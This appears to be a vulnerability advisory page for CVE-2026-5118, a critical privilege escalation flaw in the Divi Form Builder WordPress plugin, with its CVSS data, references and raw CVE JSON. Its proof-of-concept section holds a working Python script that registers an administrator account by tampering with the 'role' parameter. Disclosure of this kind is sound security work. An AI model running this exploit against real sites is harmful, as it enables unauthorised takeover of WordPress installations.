Security Vulnerability Report
CVE-2026-5118 CVSS 9.8 CRITICAL

CVE-2026-5118

Published: 2026-05-21 13:16:20
Last Modified: 2026-05-21 15:19:31

Description

The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled 'role' parameter from POST data during user registration without validating it against the form's configured default_user_role setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Divi Form Builder <= 5.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (replace with actual vulnerable endpoint)
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Payload data demonstrating the privilege escalation
payload = {
    "action": "divi_form_builder_process_registration",
    "username": "attacker_admin",
    "email": "[email protected]",
    "password": "StrongPassword123!",
    "role": "administrator"  # Vulnerable parameter: The plugin accepts this without validation
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if admin account was created.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

https://diviengine.com/divi-form-builder-changelog/
https://www.wordfence.com/threat-intel/vulnerabilities/id/72154404-f956-4ea2-96ec-166ade87885f?source=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-5118",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-21T13:16:20.013",
    "lastModified": "2026-05-21T15:19:30.540",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled 'role' parameter from POST data during user registration without validating it against the form's configured default_user_role setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-269"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://diviengine.com/divi-form-builder-changelog/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/72154404-f956-4ea2-96ec-166ade87885f?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}